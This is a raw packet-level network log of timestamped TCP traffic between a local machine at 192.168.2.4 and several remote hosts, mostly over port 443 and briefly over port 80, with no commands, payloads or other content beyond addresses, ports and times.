                                                                                                              Dec 30, 2024 11:36:24.216207027 CET49889443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:24.216245890 CET44349889142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:24.216310978 CET49889443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:24.216521025 CET49889443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:24.216535091 CET44349889142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:24.216733932 CET49883443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:24.216748953 CET44349883142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:24.216774940 CET49883443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:24.217152119 CET49890443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:24.217180967 CET49883443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:24.217197895 CET44349890142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:24.217262983 CET49890443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:24.217669964 CET49890443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:24.217683077 CET44349890142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:24.243453979 CET44349885142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:24.243511915 CET44349885142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:24.243541002 CET49885443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:24.243560076 CET44349885142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:24.243571043 CET49885443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:24.243635893 CET44349885142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:24.243680954 CET49885443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:24.244265079 CET49885443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:24.244282007 CET44349885142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:24.244721889 CET49891443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:24.244770050 CET44349891142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:24.244838953 CET49891443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:24.245062113 CET49891443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:24.245071888 CET44349891142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:24.399688005 CET44349886142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:24.399739027 CET44349886142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:24.399785042 CET49886443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:24.399785042 CET49886443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:24.399810076 CET44349886142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:24.399859905 CET49886443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:24.399866104 CET44349886142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:24.399878025 CET44349886142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:24.399918079 CET49886443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:24.401141882 CET49886443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:24.401160002 CET44349886142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:24.401555061 CET49892443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:24.401607990 CET44349892142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:24.401926994 CET49892443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:24.402146101 CET49892443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:24.402158022 CET44349892142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:24.817948103 CET44349889142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:24.818092108 CET49889443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:24.824693918 CET49889443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:24.824707985 CET44349889142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:24.824892998 CET49889443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:24.824898958 CET44349889142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:24.847412109 CET44349890142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:24.847604036 CET49890443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:24.847795010 CET44349891142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:24.847858906 CET49891443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:24.848342896 CET49890443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:24.848355055 CET44349890142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:24.848532915 CET49890443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:24.848540068 CET44349890142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:24.848845959 CET49891443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:24.848851919 CET44349891142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:24.852037907 CET49891443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:24.852044106 CET44349891142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.010695934 CET44349892142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.014594078 CET49892443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:25.035331011 CET49892443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:25.035343885 CET44349892142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.035490036 CET49892443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:25.035495996 CET44349892142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.192385912 CET44349889142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.192456007 CET49889443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:25.192481041 CET44349889142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.192549944 CET49889443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:25.193085909 CET44349889142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.193139076 CET44349889142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.193247080 CET49889443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:25.224478006 CET44349890142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.224556923 CET49890443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:25.225303888 CET44349890142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.225357056 CET44349890142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.225451946 CET49890443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:25.254123926 CET44349891142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.254178047 CET44349891142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.254281998 CET44349891142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.254350901 CET49891443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:25.382443905 CET49889443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:25.382489920 CET44349889142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.383514881 CET49893443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:25.383558989 CET44349893142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.383971930 CET49893443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:25.385030985 CET49893443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:25.385051012 CET44349893142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.385811090 CET49890443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:25.385848045 CET44349890142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.385871887 CET49890443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:25.385894060 CET49890443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:25.389970064 CET49894443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:25.390027046 CET44349894142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.390290976 CET49894443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:25.394165993 CET49894443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:25.394197941 CET44349894142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.398503065 CET49891443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:25.398523092 CET44349891142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.434961081 CET44349892142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.435008049 CET44349892142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.435132027 CET44349892142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.435278893 CET49892443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:25.454603910 CET49895443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:25.454643011 CET44349895142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.454705000 CET49895443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:25.456979036 CET49892443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:25.456995964 CET44349892142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.459234953 CET49895443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:25.459249973 CET44349895142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.459511042 CET49896443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:25.459533930 CET44349896142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.459590912 CET49896443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:25.460637093 CET49896443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:25.460648060 CET44349896142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.835774899 CET804973969.42.215.252192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.835840940 CET4973980192.168.2.469.42.215.252
                                                                                                              Dec 30, 2024 11:36:25.994129896 CET44349893142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.994191885 CET49893443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:25.994838953 CET49893443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:25.994851112 CET44349893142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.996634960 CET49893443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:25.996645927 CET44349893142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.996699095 CET44349894142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.996757030 CET49894443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:25.997014999 CET49894443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:25.997025967 CET44349894142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:25.997232914 CET49894443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:25.997239113 CET44349894142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.058078051 CET44349895142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.058185101 CET49895443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:26.058650970 CET49895443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:26.058660984 CET44349895142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.058938980 CET49895443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:26.058943987 CET44349895142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.068200111 CET44349896142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.068263054 CET49896443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:26.068684101 CET49896443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:26.068701982 CET44349896142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.068985939 CET49896443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:26.068996906 CET44349896142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.364080906 CET44349893142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.364144087 CET49893443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:26.364162922 CET44349893142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.364202023 CET49893443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:26.364263058 CET49893443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:26.364290953 CET44349893142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.364340067 CET49893443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:26.364979029 CET49898443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:26.365015984 CET44349898142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.365231037 CET49898443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:26.365308046 CET49898443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:26.365317106 CET44349898142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.374602079 CET44349894142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.374659061 CET49894443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:26.374768019 CET49894443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:26.374823093 CET44349894142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.374865055 CET49894443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:26.375447989 CET49899443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:26.375485897 CET44349899142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.375588894 CET49899443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:26.375787020 CET49899443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:26.375807047 CET44349899142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.464782000 CET44349895142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.464845896 CET44349895142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.464973927 CET44349895142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.465013981 CET49895443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:26.466602087 CET49895443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:26.467868090 CET49895443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:26.467869997 CET49900443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:26.467886925 CET44349895142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.467920065 CET44349900142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.468112946 CET49900443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:26.468425035 CET49900443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:26.468436003 CET44349900142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.621360064 CET44349896142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.621433973 CET44349896142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.621572018 CET44349896142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.621607065 CET49896443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:26.621990919 CET49896443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:26.622255087 CET49896443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:26.622272968 CET44349896142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.622731924 CET49901443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:26.622778893 CET44349901142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.622912884 CET49901443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:26.623167038 CET49901443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:26.623182058 CET44349901142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.985132933 CET44349898142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.985358953 CET49898443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:26.985915899 CET44349898142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.986080885 CET49898443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:26.987991095 CET49898443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:26.988008022 CET44349898142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.988312006 CET44349898142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:26.988887072 CET49898443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:26.989125013 CET49898443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:27.003433943 CET44349899142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:27.003643036 CET49899443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:27.004316092 CET44349899142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:27.004446983 CET49899443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:27.005927086 CET49899443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:27.005939960 CET44349899142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:27.006208897 CET44349899142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:27.006459951 CET49899443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:27.006705046 CET49899443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:27.035334110 CET44349898142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:27.047336102 CET44349899142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:27.095777035 CET44349900142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:27.095900059 CET49900443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:27.096620083 CET49900443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:27.096630096 CET44349900142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:27.098351002 CET49900443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:27.098357916 CET44349900142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:27.231823921 CET44349901142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:27.234419107 CET49901443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:27.234787941 CET49901443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:27.234798908 CET44349901142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:27.235025883 CET49901443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:27.235029936 CET44349901142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:27.252305984 CET49898443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:27.252343893 CET49899443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:27.252345085 CET49900443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:27.254477024 CET49904443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:27.254515886 CET44349904142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:27.254646063 CET49904443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:27.254962921 CET49905443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:27.255002975 CET44349905142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:27.255146027 CET49905443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:27.255657911 CET49904443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:27.255680084 CET44349904142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:27.255731106 CET49905443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:27.255745888 CET44349905142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:27.666985989 CET44349901142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:27.667032957 CET44349901142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:27.667089939 CET49901443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:27.667089939 CET49901443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:27.667117119 CET44349901142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:27.667174101 CET49901443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:27.667180061 CET44349901142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:27.667229891 CET44349901142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:27.667282104 CET49901443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:27.667973042 CET49901443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:27.667990923 CET44349901142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:27.855396032 CET44349904142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:27.855515957 CET44349905142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:27.855622053 CET49904443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:27.857719898 CET49905443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:27.869370937 CET49904443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:27.869391918 CET44349904142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:27.871150970 CET49905443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:27.871175051 CET44349905142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:27.871484041 CET49904443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:27.871490955 CET44349904142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:27.872927904 CET49905443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:27.872941017 CET44349905142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:28.220846891 CET44349905142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:28.220963955 CET49905443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:28.221497059 CET49905443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:28.221554995 CET44349905142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:28.221626997 CET49905443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:28.221951008 CET49906443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:28.221996069 CET44349906142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:28.222068071 CET49906443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:28.222302914 CET49906443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:28.222315073 CET44349906142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:28.223651886 CET49907443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:28.223695040 CET44349907142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:28.223767996 CET49907443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:28.224148035 CET49907443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:28.224164009 CET44349907142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:28.233691931 CET44349904142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:28.233761072 CET49904443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:28.233779907 CET44349904142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:28.233834028 CET49904443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:28.233921051 CET49904443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:28.233959913 CET44349904142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:28.234034061 CET49904443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:28.234426975 CET49908443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:28.234473944 CET44349908142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:28.234549046 CET49909443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:28.234580994 CET49908443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:28.234589100 CET44349909142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:28.234642982 CET49909443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:28.234782934 CET49908443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:28.234797001 CET44349908142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:28.234827995 CET49909443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:28.234843969 CET44349909142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:28.833929062 CET44349908142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:28.834160089 CET49908443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:28.834717989 CET44349908142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:28.835098028 CET49908443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:28.840346098 CET49908443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:28.840361118 CET44349908142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:28.840435982 CET44349906142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:28.840579033 CET49906443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:28.840641022 CET44349908142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:28.840723038 CET49908443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:28.841229916 CET44349906142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:28.841392994 CET49906443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:28.841517925 CET49908443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:28.842474937 CET44349907142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:28.842675924 CET49907443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:28.843758106 CET49907443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:28.843774080 CET44349907142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:28.845837116 CET49907443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:28.845849037 CET44349907142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:28.854008913 CET44349909142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:28.854119062 CET49909443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:28.858256102 CET49909443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:28.858266115 CET44349909142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:28.858520985 CET49909443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:28.858526945 CET44349909142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:28.876205921 CET49906443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:28.876226902 CET44349906142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:28.876601934 CET44349906142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:28.876861095 CET49906443192.168.2.4142.250.186.142
